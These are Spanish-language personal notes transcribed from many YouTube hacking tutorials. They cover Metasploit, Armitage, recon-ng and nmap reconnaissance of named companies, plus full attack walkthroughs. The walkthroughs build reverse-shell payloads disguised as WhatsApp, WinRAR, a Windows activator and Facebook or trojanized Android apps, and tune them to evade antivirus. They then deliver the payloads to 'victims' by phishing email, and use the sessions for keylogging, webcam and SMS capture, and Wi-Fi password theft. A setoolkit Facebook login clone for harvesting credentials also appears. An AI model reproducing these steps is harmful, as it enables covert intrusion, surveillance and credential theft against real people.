METASPLOIT Data Security VIDEO 1 Conceptos básicos de metasploit https://www.youtube.com/watch?v=tPrjUv3tSok Metasploit Framework Conceptos Básicos temas a tratar Que es metasploit para qué sirve metasploit historia de metasploit tener una máquina virtual en virtualbox de kali linux *** Que es metasploit metasploit es un proyecto de código abierto orientado a la seguridad informática, el cual provee de información relacionada con vulnerabilidades además de ayudar a realizar pruebas de penetración. *** Para qué sirve Su subproducto más conocido es metasploit framework. Se trata de una herramienta para desarrollar y ejecutar exploits en contra de un equipo remoto. Windows, Mac, Android, linux *** Un poco de historia Metasploit fue creado en el año 2003 como una herramienta de red portátil utilizando el lenguaje de programación perl. el 21 de octubre del 2009 el proyecto de metasploit fue adquirido Rapid7 una empresa de seguridad que ofrece soluciones unificadas en gestión de vulnerabilidades. cómo Iniciar metasploit en kali linux netstat -ntpl ó service postgresql status service postgresql start netstat -ntpl ó service postgresql status msfdb init msfconsole Estando dentro de msfconsole msf>banner msf>exit msfconsole -q msf>help msf>db_status msf>hosts msf>vulns msf>db_connect msf>db_disconnect msf>db_status msf>db_connect msf>db_status msf>exit Data Security VIDEO 2 Taller metasploit https://www.youtube.com/watch?v=fI-jz99Hso4 Arquitectura metasploit Temas a tratar En que está desarrollado metasploit Arquitectura de metasploit directorios ¿En qué está hecho? Metasploit es un proyecto de código abierto orientado a la seguridad informática. Este cliente con un subproyecto llamado "Metasploit framework" tiene otros subproyectos importantes como por ejemplo las bases de datos de opcode (códigos de operación) metasploit originalmente se desarrolló en perl aunque actualmente metasploit framework está escrito completamente en ruby. ¿Cómo es por dentro? Metasploit cuenta con una arquitectura que es sencilla de entender si se analiza de forma gráfica, metasploit cuenta con los siguientes módulos: - Librerías - Interfaces - Herramientas - Plugins - Módulos Visto de forma gráfica, metasploit tiene el siguiente aspecto El gráfico anterior nos permite entender cómo está diseñado metasploit por dentro. Ahora bien, dentro de la carpeta de metasploit encontraremos sistemas de archivos, estos están divididos en diversos directorios. Veamos algunos de los directorios: Data: Contiene y muestra los archivos editables utilizados por metasploit. .Documentation: Provee documentación para el framework. .Lib: Aquí es posible encontrar el código base del framework. modules: Aquí se ubican los módulos disponibles contenidos en la versión de metasploit que adquirimos. Los directorios antes mencionados son solo algunos de los que tiene metasploit. Veamos de forma práctica en una consola de comando como poder explorar dicho contenido. Para poder explorar dicho contenido debemos acceder a la siguiente ruta usr/share/metasploit-framework cd / cd usr ls -l cd share ls -l cd metasploit-framework clear ls -l cd db ls -l cd .. ls cd documentation ls cd .. exit Data Security VIDEO 3 Módulos de metasploit https://www.youtube.com/watch?v=lHv2JESmn3c Temas a tratar - Qué son los payloads Qué son los Exploits Qué son los encoders Qué son los nops Qué son los auxiliares Un Payload, es un programa que acompaña a un exploit para realizar funciones específicas una vez el sistema objetivo es comprometido, la elección de un buen payload es una decisión muy importante a la hora de aprovechar y mantener el nivel de acceso obtenido en un sistema. El payload es el medio de transporte del exploit para llevarlo a su objetivo. El payload es el camión y la carga es el exploit. ¿Qué son los exploits? Un exploit es un programa que explota una o varias vulnerabilidades en un software determinado, frecuentemente es utilizado para ganar acceso a un sistema y tener un nivel de control sobre él. ¿Qué son los encoders? Los encoders son una herramienta interesante dentro de metasploit framework. Muchas veces al crear un payload debe ser codificado, esto con la intención de intentar evadir los sistemas antivirus y otras medidas de seguridad. ¿Qué son los nops? Los nops son módulos de no operation y su función es sumamente interesante, debido a que estos mantienen los tamaños de las cargas útiles (payloads) de forma consistente. ¿Qué son los auxiliares? Un auxiliar es un programa que permite obtener información sobre el objetivo con el fin de determinar posibles vulnerabilidades. Este tipo de programas son útiles para establecer una estrategia de ataque sobre un sistema objetivo. Vamos hacer ejercicios en la terminal service postgresql start msfconsole -q msf>search auxiliary msf>clear msf>search payloads para utilizar un payload msf>use exploit/Firefox/local/exec_shellcode ya estando dentro de él puedo digitar msf exploit/Firefox/local/exec_shellcode>info msf exploit/Firefox/local/exec_shellcode>back msf>clear msf>search exploits msf>use exploit/windows/misc/citrix_streamprocess_data_msg msf exploit/windows/misc/citrix_streamprocess_data_msg>options ó show options msf exploit/windows/misc/citrix_streamprocess_data_msg>info msf exploit/windows/misc/citrix_streamprocess_data_msg>clear msf exploit/windows/misc/citrix_streamprocess_data_msg>back msf>search nops msf>use exploit/windows/http/mdaemon_worldclient_form2raw msf exploit/windows/http/mdaemon_worldclient_form2raw>options msf exploit/windows/http/mdaemon_worldclient_form2raw>info msf exploit/windows/http/mdaemon_worldclient_form2raw>clear msf exploit/windows/http/mdaemon_worldclient_form2raw>back msf>clear msf>search encoder msf>use exploit/windows/http/novell_messenger_acceptlang msf exploit/windows/http/novell_messenger_acceptlang>info msf exploit/windows/http/novell_messenger_acceptlang>options msf exploit/windows/http/novell_messenger_acceptlang>back msf>clear msf>search Apple msf>search osx Data Security VIDEO 4 Filtrado de exploit https://www.youtube.com/watch?v=vlZF_QJX120 temas a tratar la consola de IRb Filtrado Exploits Resultados en consola ¿Qué es Irb? Irb o la consola de ruby es un intérprete interactivo que permite a un desarrollador ingresar comandos y/o bloques de código que posteriormente serán ejecutados por Ruby. filtrado de exploits Como sabemos después de un escaneo con nmap encontramos puertos abiertos, servicios corriendo, así como las versiones de estos. Cada puerto abierto es una probable puerta de acceso al sistema objetivo. Veamos un ejemplo: Como se aprecia tenemos varios puertos abiertos, los cuales pueden sernos de utilidad para lograr un acceso al sistema. Veamos cómo filtrar la búsqueda de exploits para intentar atacar mediante el puerto 445 (por citar un ejemplo) . el resultado del filtrado de exploits por número de puerto vamos ahora hacer la práctica en la terminal: service postgresql start msfconsole -q msf> ahora con ctrl + shift + t abrimos otra pestaña en esa pestaña nueva le damos un netdiscover Escogemos una dirección ip para realizar el filtrado de exploits 192.168.0.11 Ahora le hacemos un escaneo sencillo nmap 192.168.0.11 esto es para ver cuales son los puertos que están abiertos framework.exploits.each_module { |n,e| x=e.new; print_good(“#{e.fullname}; #{x.datastore[‘RPORT’]}”) if x.datastore[‘RPORT’].to_i == 443 }; nil ahora en: msf>irb >> >>framework.exploits.each_module { |n,e| x=e.new; print_good(“#{e.fullname}; #{x.datastore[‘RPORT’]}”) if x.datastore[‘RPORT’].to_i == 139 }; nil >>framework.exploits.each_module { |n,e| x=e.new; print_good(“#{e.fullname}; #{x.datastore[‘RPORT’]}”) if x.datastore[‘RPORT’].to_i == 443 }; nil >>exit msf exploit(windows/novell/netiq_pum_eval)>info Data Security VIDEO 5 opciones avanzadas para módulos de metasploit https://www.youtube.com/watch?v=PA2xOWY0xHs service postgresql start msfconsole -q msf>banner msf>help msf>show payloads msf>clear msf>show exploits msf payload(linux/armle/shell_bind_tcp) >options msf payload(linux/armle/shell_bind_tcp) >advanced msf payload(linux/armle/shell_bind_tcp) >back msf>use exploit/multi/handler msf exploit(multi/handler)>options msf exploit(multi/handler)>advanced msf exploit(multi/handler)>back msf>search android msf> use exploit/multi/local/allwinner_backdoor msf exploit(multi/local/allwinner_backdoor)>options msf exploit(multi/local/allwinner_backdoor)>advanced msf exploit(multi/local/allwinner_backdoor)> Data Security VIDEO 6 Librerías en meterpreter https://www.youtube.com/watch?v=LO9NJSycWqQ meterpreter>sysinfo meterpreter>help meterpreter>use -l meterpreter>use mimikats meterpreter>? meterpreter>use -l meterpreter>use kiwi meterpreter>? meterpreter> _______________________________________________________________ Data Security LAS 5 ETAPAS DEL HACKING ÉTICO https://www.youtube.com/watch?v=1hra-VxvIFs 1. 2. 3. 4. 5. Reconocimiento Scanning Acceso al sistema Persistencia Borrar rastros 1. Reconocimiento en esta primera etapa un atacante se vale de diversas técnicas para recolectar toda la información que le sea posible sobre su objetivo. Entre la información que puede ser recolectada a través de internet se puede mencionar: - Datos relacionados con los clientes de la empresa. Datos relacionados con los empleados de la empresa. Información sobre la red de la empresa. Sistemas que utiliza la empresa. Existen dos tipos de reconocimiento que pueden ser utilizados por un hacker: - Reconocimiento pasivo Permite recolectar información sin la necesidad de interactuar directamente con la víctima. pOf -i eth0 -p ettercap Maltego - Reconocimiento activo Permite recolectar información directamente con la víctima. nmap, armitage 2. Escaneo de puertos y servicios Una vez concluida la fase de reconocimiento la siguiente etapa es el escaneo de puertos y servicios, también conocida como scanning. En esta etapa se realiza un escaneo de la red objetivo para poder ejecutar el ataque. nmap Durante el proceso de escaneo se busca obtener la siguiente información: - Sistemas operativos que utilizan los servidores y las terminales. Los puertos abiertos en los servidores. Se hace un escaneo de vulnerabilidades. Se realiza un mapeo de redes. 3. Obtención de acceso al sistema Una vez que se conocen las vulnerabilidades entonces se procede con la siguiente etapa en la cual el atacante busca obtener el acceso al sistema, esto se logra derivado de las vulnerabilidades encontradas. Para lograr el acceso a un sistema se pueden emplear diversas técnicas: - Secuestro de credenciales. Ataques a navegadores web. Bindeo de puertas traseras (backdoors). Ataques de hombre en medio (man in the middle). Una vez tenga acceso al sistema hay que realizar Elevación de privilegios. 3.1. Elevación de privilegios Cuando se compromete un sistema generalmente se obtienen privilegios estándar (privilegios de usuarios). El atacante debe ejecutar acciones que le permitan elevar estos privilegios para convertirse en usuario administrador. 4. Persistencia en el sistema Una vez que el sistema tiene privilegios de administrador tiene control total sobre el sistema y puede realizar cualquier cantidad de acciones. La principal de estas acciones es mantener el acceso a dicho sistema. En esta etapa el atacante asegura el poder entrar y salir del sistema comprometido tantas veces como lo desee sin la necesidad de realizar procedimientos complejos. Esto se logra instalando: - Caballos de Troya (troyanos). Puertas traseras (backdoors) Rootkits Una vez que el atacante ya ha garantizado su acceso al sistema y ya con el control total de este, se pueden realizar acciones tales como: - Subir o bajar archivos del sistema comprometido Alterar el funcionamiento del sistema Desinstalar software de forma remota y silenciosa Grabar la actividad del usuario (cámara y micrófono) Otra de las acciones importantes que puede realizar el atacante es utilizar el sistema comprometido como punto de partida para acceder a otros sistemas que pertenecen a la organización objetivo, a este procedimiento se le conoce como pivoting. 5. Limpiar rastros Una vez el atacante ha realizado todos los cambios y modificaciones en el sistema lo que se realiza es el procedimiento de borrado de huellas también conocido como eliminación de rastros o evidencia. En el caso de hacking ético se siguen procedimientos que son muy similares, pero la diferencia entre un hacker no ético y un hacker ético es: El hacker ético no ejecuta las 5 etapas de hacking, los hackers éticos terminan su trabajo haciendo reportes donde hacen recomendaciones para proteger los sistemas y evitar ser víctimas de un atacante. _______________________________________________________________ Data Security VIDEO Penetrando windows 7 con metasploit https://www.youtube.com/watch?v=xXVolDpdTfQ Necesitamos utilizar una herramienta que se llama veil ifconfig la ip de kali linux 192.168.0.7 ls -la cd Veil-Evasion ls ./Veil-Evasion.py se encuentran varios payloads list use 19 generate 1 --- msfvenon enter LHOST--- 192.168.0.7 LPORT--- 4444 enter colocar el nombre del payload: Activador win7 exit exit exit iniciamos metasploit service postgresql start msfconsole -q msf>use exploit/multi/handler msf exploit(multi/handler)>options msf exploit(multi/handler)>set LHOST 192.168.0.7 msf exploit(multi/handler)>set LPORT 4444 msf exploit(multi/handler)>exploit esperamos hasta que la víctima le haga doble clic a lo que le mandamos en la máquina de windows 7 se ejecuta el archivo Activador win7.back y el windows 7 se conectara a la máquina de kali linux meterpreter>sysinfo meterpreter>pwd meterpreter>ps ----ps es para ver los procesos estamos mirando los procesos para ocultarnos en algún proceso que nunca se cierre esa es una forma de ocultarse. buscamos por ejemplo el proceso del explorer.exe su código 3336 meterpreter>migrate 3336 migrating from 992 to 3336 lo que hace este comando es que se está escondiendo el power shell hecho en veil detrás del explorer.exe en algunos casos la migración falla, entonces habría que probar con otro proceso para ocultarnos meterpreter>pwd meterpreter>ls meterpreter>cd .. meterpreter>ls meterpreter>pwd c:/ meterpreter>ls meterpreter>cd Windows meterpreter>ls meterpreter>execute meterpreter>execute -f notepad.exe meterpreter> _______________________________________________________________ Data Security VIDEO Configurar Veil framework https://www.youtube.com/watch?v=EiRwvW6Z6VM apt-get install veil veil-evasion next next yes next finish siguiente pywin32-218 siguiente siguiente terminar siguiente siguiente siguiente please enter a command _______________________________________________________________ Hacking Ético León VIDEO Instalar Veil Evasion Framework 3.0 en kali linux https://www.youtube.com/watch?v=HLK3T9CGee4 https://github.com/Veil-Framework/Veil https://www.veil-framework.com/ apt-get install veil-evasion otra forma de instalar. Debe estar instalado git sino está sudo apt-get -y install git git clone https://github.com/Veil-Framework/Veil.git ls ./config/setup.sh --force --silent instalar python desde wine Siguiente Siguiente Siguiente Finish Pywin32-220 Siguiente Siguiente Siguiente Finish Pycrypto-2.6.1 Siguiente Siguiente Siguiente Finish Ruby Ok Aceptar licencia Siguiente Siguiente Siguiente Finish Ya despues que instale todo cd Veil ls ./Veil.py list use 1 list use 28 _________________________________________________________________________ Hacking Ético León VIDEO crear payload con Veil Evasion y migrar proceso https://www.youtube.com/watch?v=mPc7wDGuvhk cd Veil ls ./Veil.py list use 1 list use 28 Abrimos otra terminal y digitamos ifconfig para ver nuestra ip 192.168.1.20 set LHOST 192.168.1.20 set LPORT 1030 set USE_PYHERION Y options options generate colocar un nombre Python_Installer escogemos la opción 1 Pinstaller Sale una información en donde se creó el archivo Voy a copiar el archivo cp /usr/share/veil-output/completed/Python_Installer.exe /root/Escritorio/ Ahora utilizamos el msfconsole msfconsole -r /usr/share/veil-output/handlers/Python_Installer.rc msf Exploit(handler)> Ahora pasamos el archivo que está en el escritorio a la víctima Listo lo pasamos a Windows Ahora en windows miramos en el navegador nodistribute.com Para ver cuantos antivirus lo detectan Le debo de cambiar el nombre al archivo y colocarle Python Cuando le dé doble clic allí se empieza a ejecutar silenciosamente y al mismo tiempo en kali linux se está iniciando una sesión sessions -i 1 meterpreter> meterpreter>sysinfo Bueno aquí es necesario ocultarse meterpreter>run post/windows/manage/migrate Lo que hace esto es que se esconde en otro proceso y así no nos borren meterpreter>ps meterpreter> Si borran el archivo ya no hay problemas porque ahora ya estamos en otro proceso meterpreter>mkdir vulnerable _________________________________________________________________________ Hacking Ético León VIDEO crear payload con Veil Evasion https://www.youtube.com/watch?v=QpWDYNpHq4M Como podemos camuflar un payload cd Veil ls ./Veil.py list use 1 list use 21 --- powershell/meterpreter/rev_https.py Abrimos otra terminal para ver cual es nuestra ip… ipconfig 192.168.1.20 set LHOST 192.168.1.20 options generate colocar el nombre a la aplicación: Whatsapp vamos a copiar la ruta para pasarlo al escritorio cp /usr/share/veil-output/source/Whatsapp.bat/ /root/Escritorio/ ahora lo que hacemos es abrir metasploit framework con el archivo .rc msfconsole -r /usr/share/veil-output/handlers/Whatsapp.rc los archivos rc nos ayudan a automatizar ya se encuentra a la escucha nuestro metasploit framework Así que vamos a ingresar en una usb el archivo para pasarlo a windows. una vez pasado a windows ahora vemos en el navegador en nodistribute.com cuantos antivirus lo detectan bueno lo detectan varios antivirus cuando es .bat cuando le damos doble clic se genera la conexión con el kali linux una sesión Bueno vamos a utilizar un programa para convertir de .bat a .exe se llama bat_to_exe_converter para utilizar el programa buscamos el archivo .bat hay que buscar la imagen de whatsapp la buscamos en google y la descargamos esta imagen hay que convertirla en icono y alli utilizamos toyicon y lo convierte a .ico bueno volvamos a bat.exe en donde dice version information buscamos el icono. el que creamos y lo colocamos va a tener una arquitectura de 32 bits y le damos compilar y ya se genero el ejecutable pasó de .bat a .exe con su icono Ahora vamos a subir nuevamente el archivo a nodistribute.com para si lo detectan y ahora solamente lo detectan 5 de 35 antivirus entonces es muy bueno si se le da doble clic al archivo, se genera una nueva sesión en kali linux sessions -i 2 meterpreter>sysinfo --- información de la máquina objetivo meterpreter>getuid --- que usuario estamos conectado meterpreter>screenshot ----tomamos una foto meterpreter>help --- para ver todos los comandos meterpreter>getsystem --- subir de privilegios ser system pero se necesitan otros comandos para ser administradores por último migramos a otro proceso porque es sospechoso que el archivo que se está utilizando en windows no se puede eliminar run /post/windows/manage/migrate ya después que migró ya se puede eliminar el archivo en windows del whatsapp, pero no se pierde la sesión porque ya se encuentra en otro proceso _________________________________________________________________________ Hacking Ético León VIDEO Activar Keylogger con Metasploit | Kali Linux https://www.youtube.com/watch?v=jvE7W2r2uY0 En la parte anterior hicimos un backdoor con veil 95% indetectable . ya hay una sesión de metasploit meterpreter>run post/windows/capture/keylog_recorder _________________________________________________________________________ _________________________________________________________________________ https://www.redeszone.net/2015/07/29/plaguescanner-una-aplicacion-similar-avirustotal-pero-totalmente-opensource/ https://github.com/PlagueScanner/PlagueScanner Explorador de plagas PlagueScanner es un marco de escáner AV múltiple para organizar un grupo de escáneres AV individuales en un escáner contiguo. Hay dos componentes básicos en esta versión inicial: Core y Agentes. Todos los componentes de PlagueScanner tienen las siguientes dependencias: 1. Python3: https://www.python.org/ 2. ZeroMQ: http://zeromq.org/ 3. pyzmq: https://github.com/zeromq/pyzmq Los Agentes tienen la siguiente dependencia adicional: 1. Solicitudes: http://docs.python-requests.org/en/latest/ Y el Core tiene la siguiente dependencia. 1. Servidor web (se recomienda NGINX): http://nginx.org/ En el mismo directorio que cada archivo .py, debe haber un archivo de configuración con el siguiente formato. [PlagueScanner] IP = Port = 5556 OutboundSamplesDir = /usr/local/www/plaguescanner [ClamAV] IP = [ESET] IP = [Bitdefender] IP = Los escáneres utilizados fueron los siguientes: 1. ClamAV: http://www.clamav.net/index.html 2. ESET: http://www.eset.com/us/business/server-antivirus/file-security-linux/ 3. Bitdefender: http://www.bitdefender.com/business/antivirus-for-unices.html Nota : Al agente de Trend Micro le falta la expresión regular. Esto se solucionará en breve. El directorio que sirve NGINX debe tener los permisos de grupo configurados + wy el usuario que ejecuta plaguescanner.py como agregado a ese mismo grupo. Esto se ha probado con cada escáner instalado en máquinas virtuales separadas con el Core también separado. El Core y cada una de las otras máquinas virtuales deben estar en el mismo segmento de red cerrado. Después de iniciar cada agente, escanee un archivo así: $ ./plaguescanner.py sample.exe _________________________________________________________________________ Páginas web Online en busca de virus https://www.virustotal.com/es/ https://virusscan.jotti.org/ http://nodistribute.com/ https://metadefender.opswat.com/#!/ http://www.virscan.org/ Si no queremos que nuestros archivos se compartan con las empresas antivirus debemos evitar utilizar las plataformas anteriores y, a cambio, hacer uso de otras similares como: ● ● ● ● ● ● ● StopVir.us Poison Scanner NoDistribute Majyx VirusCheckMate ZiScan http://wwww.reverse.it/ Aunque no podemos tener la certeza de que no compartan los archivos, al menos así lo aseguran. https://securitytwins.com/index.php/2019/01/09/es-o-no-es-un-malware-este-es-el-grandilema/ _________________________________________________________________________ Error 404 Not Found VIDEO Fase Reconocimiento Auditoría Web by Ferre https://www.youtube.com/watch?v=GU9BP8sWXT4 whois cemex.com se crea un archivo con todo lo que encontremos y lo vamos guardando allí hay una pagina que se llama network tools https://network-tools.com/ colocamos en la caja de texto: cemex.com y clic en go. La información originada aquí se guarda en el archivo. después en la terminal digitamos nmap -sS -sv cemex.com en otra terminal: nslookup cemex.com nslookup www.cemex.com otro comando theharvester -d cemex.com -l 500 -b all Este se encarga de buscar emails en el dominio otro comando host cemex.com host www.cemex.com host -t ns cemex.com host -t ns www.cemex.com otro comando dig cemex.com dig www.cemex.com verificar dns ahora vamos a utilizar unos scripts interesantes de nmap nmap --script dns-brute cemex.com este nmap se brincó la protección de incapsula y puedo ahora conocer el servicio que se encuentra en cada puerto ahora otro script nmap nmap --script http-waf-fingerprint cemex.com con este script es para saber si tiene algún tipo de protección que no hallamos detectado otro comando nmap -sS -sv upload.cemex.com nmap --script http-waf-fingerprint omhe.org esta página está protegida nmap --script http-slowloris-check www.saltilloindustrial.com _________________________________________________________________________ CAPTURA DE INFORMACIÓN 1. recon-ng: http://www.reydes.com/d/?q=Reconocimiento_Web_utilizando_Recon_ng Data Security VIDEO: Recopilando información recon-ng https://www.youtube.com/watch?v=kJ6tz1HDM9E recon-ng funciona parecido a maltego, pero esta es gráfica y recon-ng es por comandos. Abrimos la terminal de kali linux… digitamos recon-ng lo primero que hay que hacer es un área de trabajo workspaces add datasecurity Ahora tenemos que aderirle un dominio add domains udemy.com muestrame los dominios que acabo de ingresar show domains Ahora vamos a ver los módulos que tiene esta herramienta show modules vamos a utilizar un módulo use recon/domains-hosts/hackertarget Ahora vamos a configurar el módulo show info Vamos a extraer direcciones ip de subdominios set SOURCE udemy.com ahora lo ejecutamos run _________________________________________________________________________ _________________________________________________________________________ Hackersploit VIDEO 1 Recon-ng - Commands, Workspaces And Data Management https://www.youtube.com/watch?v=0J6Auz88iTY recon-ng show show domains show dashboard clear workspaces add wls clear show show workspaces ruta de recon--- /usr/share/recon-ng workspaces select default clear show show modules clear add domains bbc.com show domains add companies BBC New Company show companies -Buscar módulos search whois -utilizar un módulo use whois_pocs clear show info run _________________________________________________________________________ Hackersploit VIDEO 2 Recon-ng - Adding API Keys, Database Commands and Advanced Scanning https://www.youtube.com/watch?v=ueWeucZMdmk show keys workspaces select wls clear show keys aquí podemos ver la API https://account.shodan.io copiamos la API de shodan kays add shodan_api Bsdaerdf456tfgyhvgfd show keys clear search shodan clear show domains add domains bbc.com show domains delete delete domains 1 show domains add domains bbc.com clear use interesting_files show info back use google_site_web show info run back use interesting_files run le da clic derecho al archivo robots.txt y se abre y muestra información de la página web _________________________________________________________________________ _________________________________________________________________________ Hackersploit VIDEO 3 Recon-ng - Complete Scan Emails, Sub Domains & Hidden Files https://www.youtube.com/watch?v=68rRliy5DBw recon-ng add domains microsoft.com show domains use whois_pocs show info run show contacts back use bing_domain_web show info show domains run clear show hosts back clear use brute_hosts show info run clear show hosts back clear use interesting_files show info run back clear show contacts clear show hosts para investigar mas colocamos recon-ng en youtube.com _________________________________________________________________________ Hackersploit VIDEO 4 Recon-ng - Introduction And Installation https://www.youtube.com/watch?v=x80wy7XQCoU recon-ng _________________________________________________________________________ Hackersploit VIDEO 5 Recon-ng - IP Geo-location https://www.youtube.com/watch?v=9NJmKm-ipAA show hosts show domains clear add hosts bbc.com use hosts-hosts/resolve show hosts run show hosts clear use freegeoip show info show hosts run 1-4 --- este comando es así porque hay 4 hosts los resultados que salgan se colocan en google maps _________________________________________________________________________ Hackersploit VIDEO 6 Recon-ng - Scanning Services With builtwith API https://www.youtube.com/watch?v=Bx6D-VYz4no recon-ng clear show keys En esta página web podemos obtener una api https://api.builtwith.com kays add builtwith_api dlkvfdklñkkbmñkwkmbñkw clear show domains show hosts clear use builtwith show info add domains finercoder.com clear show domains run _________________________________________________________________________ Hackersploit VIDEO 7 Recon-ng - Generating Reports https://www.youtube.com/watch?v=d2Po2e_oyE4 recon-ng clear show domains show hosts clear show dashboard clear search reporting use reporting/csv show info run back use reporting/html clear show info set CUSTOMER BBC set CREATOR Zagaz run buscar el archivo en la ruta de recon-ng _________________________________________________________________________ Oscar Perort VIDEO Prueba de penetración y exploración con Armitage Kali en android https://www.youtube.com/watch?v=W3I7UQvEcEU digitamos en la consola service postgresql start armitage clic en connect clic en si abrir otra consola y digitar ifconfig 192.168.1.8 vamos a crear un archivo apk en msfvenom msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.8 lport=4567 -R >/root/Escritorio/facebook.apk también lo podemos hacer con armitage clic en payload clic en meterpreter clic en reverse_tcp colocamos el lhost=192.168.1.8 y el lport= 4567 clic en Launch después que la aplicación apk esté lista la podemos enviar por whastapp o por drive o cualquier medio de envío electrónico cuando la victima le da doble clic al apk se establece conexión con armitage hacemos clic derecho escoger meterpreter clic en interact clic en meterpreter shell en el shell podemos digitar help y nos salen los comandos que se pueden utilizar meterpreter>help meterpreter>sysinfo meterpreter>dump_sms en otra terminal cd /usr/share/armitage ls nano sms_dump_201812345.txt _________________________________________________________________________ adrianchelo VIDEO kali linux, ataque con armitage (video con audio) https://www.youtube.com/watch?v=5d2PT2ShBiI https://www.youtube.com/watch?v=5d2PT2ShBiI&t=339s Abrimos el metasploit service postgresql start msfconsole -q y en otra terminal armitage dejamos por default lo que dice allí clic en connect clic en hosts add host 192.168.1.9 clic en aceptar clic derecho en el nuevo host escogemos host escogemos operating system escogemos windows clic en win 7 clic en el menú attacks clic en find attacks allí vas a buscar todas las vulnerabilidades de los equipos que están conectados clic en aceptar tenemos que buscar por internet tipos de vulnerabilidades en la búsqueda digitamos ms11 este es un tipo de vulnerabilidad la vulnerabilidad se llama: ms11 -003 Microsoft Internet Explorer CSS Recursive Import Use After Free clic en Launch se nos genera un link: Local IP: http://182.168.2.104:8080/ZbmUOD Bueno hay que aplicar ingeniería social y le podemos enviar un correo a la persona que se encuentra en nuestra misma red. después que el la abra el link estaría infectado nunca utilices tus correos personales. crea un correo diferente con información ficticia hay que escribir algo llamativo para que la persona lo abra en la víctima se puede ver el ipconfig para ver si se encuentra en la misma red ahora se abre el correo por internet explorer clic en el enlace una vez le de clic ya nos podemos conectar a ella se establece una conexión apenas el abra el enlace, en el armitage el icono del pc se pone en rojo clic derecho meterpreter explorer scremshot --Activar camara--- meterpreter --- explorer --- webcam shot _________________________________________________________________________ Naturalsoul VIDEO [Trabajo Universitario] Hackear Windows 10 con Armitage en Kali Linux 2.0 https://www.youtube.com/watch?v=X4VTOPJ0nBg https://www.youtube.com/watch?v=X4VTOPJ0nBg service postgresql start armitage clic en connect clic en yes el programa armitage coloca el equipo lento gasta bastantes recursos de memoria ram armitage detecta los pcs que están en nuestra red sino detecta entonces clic en el menu hosts escoger nmap scan quick scan colocar el rango de red por ejemplo 192.168.0.0/24 la ip victima es la 192.168.0.52 nos vamos entonces al menu de la izquierda seleccionamos payload clic en windows meterpreter reverse_tcp doble clic tenemos que ver cual es la ip de kali linux ifconfig 192.168.0.50 LHOST = 192.168.0.50 LPORT = 6565 en donde dice output buscamos el que dice exe clic en launch para generar el troyano o payload buscamos una carpeta en donde podamos guardar el archivo payload colocarle un nombre winrar.exe clic en save se genera y quedó guardado en el escritorio ahora volvemos a repetir los pasos en armitage volvemos a seleccionar el mismo exploit reverse_tcp asegurarse de que sea la misma ip y puerto del que acabamos de crear y en output lo dejamos en multi/handler clic en Launch ya con eso debería estar nuestro servidor en escucha ahora lo que toca es pasar el archivo troyano a nuestra máquina de windows hay que estar pendientes del antivirus…. si se puede desactivar seria mejor hacemos doble clic al archivo clic en ejecutar de todas formas y se establece una sesión en meterpreter y el icono del pc aparece en rojo clic derecho meterpreter --- access --- _________________________________________________________________________ Hacking Ético León VIDEO SETOOLKIT #1 | HEL https://www.youtube.com/watch?v=MFjuTZeip4U Ingeniería social: La manipulación inteligente de la tendencia natural de la gente a confiar. el ser humano es la parte principal de vulnerar vamos a utilizar una herramienta de kali linux llamada setoolkit con esta herramienta vamos a crear un phishing o un clonado de una página web, en este caso facebook. esto va a levantar un servidor apache y va haber una dirección ip y un puerto a la escucha para entrar a la herramienta digitamos setoolkit digitamos el 1 ---social engineer 2 ---web site attack vector 3 ---credential harvester attack method 2 -- site cloner nos pide la ip de kali linux en otra terminal dígito ifconfig 192.168.1.8 ahora nos pide la url a clonar: https://www.facebook.com/login.php y le damos enter y comienza el clonado ya queda a la escucha para el cometido en otro equipo de la misma red abrir un navegador y digitar en la barra de direcciones http://192.168.1.8:80 sale la pagina clonada de facebook digitar el usuario… digitar la contraseña… y aparece esos datos en kali linux _________________________________________________________________________ DragonJAR VIDEO Curso GRATIS de Introducción a Metasploit 2018 https://www.dragonjar.org https://www.youtube.com/watch?v=I3fzrEW1vf4 msfupdate: Usado para actualizar Metasploit a su última versión. msfconsole: Usado para ingresar a la consola de Metasploit. msfvenom: Creación de puertas traseras (Backdoor) msf>help: Sirve para obtener ayuda sobre el uso de metasploit msf>search: Permite buscar dentro del framework lo que necesites msf>use: se usa para seleccionar o cargar cualquier módulo msf>info: permite mostrar la documentación del módulo. msf>show: Permite mostrar opciones, objetivos, parámetros, etc msf>set: Permite asignar valores a las diferentes opciones. msf>check: Verifica que el exploit pueda funcionar sin ejecutarlo msf>run o exploit: Ejecuta el módulo con los parámetros definidos exit -y: puedo salir de metasploit Aquí se encuentran todas las carpetas de metasploit cd /usr/share/metasploit-framework ls cd modules ls msfconsole msf>banner msf>help msf>db_status msf>hosts msf>workspace msf>services es bueno crear workspace para una red en particular msf>workspace -h msf>workspace -a webinario msf>workspace como se en workspace estoy trabajando… el que tiene el asterisco msf>hosts msf>creds ----credenciales msf>notes msf>vulns msf>loot osea este workspace está limpio para utilizar msf>ifconfig msf>workspace msf>clear identificar que hay dentro de nuestra red msf>search -h msf>search name:arp_sweep msf>use auxiliary/scanner/discovery/arp_sweep msf auxiliary(arp_sweep)> este video va por 1:08:46 horas _________________________________________________________________________ esta pagina es parecida a nodistribute.com pero mejor https://spyralscanner.net/ _________________________________________________________________________ Data Security VIDEO EXTRACCIÓN DE CONTRASEÑAS WIFI MEDIANTE CMD DESDE KALI LINUX https://www.youtube.com/watch?v=lrtoTIKfzJo ya el equipo debe de estar comprometido meterpreter>sysinfo meterpreter>getuid Hay que tener privilegios de administrador para poder hacer esta extracción de contraseñas wifi, osea elevar privilegios meterpreter>shell c:\WINDOWS\system32\netsh wlan show profile Mostrar los perfiles de red inalámbricas a las que ese equipo se ha conectado c:\WINDOWS\system32\netsh wlan show profile name=INFINITUM0934 key=clear Muestra la contraseña de esta red _________________________________________________________________________ OpErs LINUX VIDEO CÓMO INYECTAR PAYLOAD EN APK ORIGINAL CON METASPLOIT (FUERA DE LA RED) https://www.youtube.com/watch?v=G7tY7AnfnoU se crea una cuenta en ngrok https://ngrok.com/ https://dashboard.ngrok.com/user/signup y lo descargamos ls ./ngrok autoken y aqui va el codigo abrimos 2 terminales terminal 1: ifconfig terminal 2: ./ngrok tcp 192.168.1.74:4444 terminal 1: cd Escritorio clear msfvenom -x Flow\ Free_v4.2_apkpure.com.apk -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15101 -o flow.apk vamos a crear un archivo para automatizar algunos procesos abrimos un editor de texto use multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST 192.168.1.74 set LPORT 4444 exploit ---ahora lo guarmos guardar como en el escritorio colocar nombre: meterpreter.rc 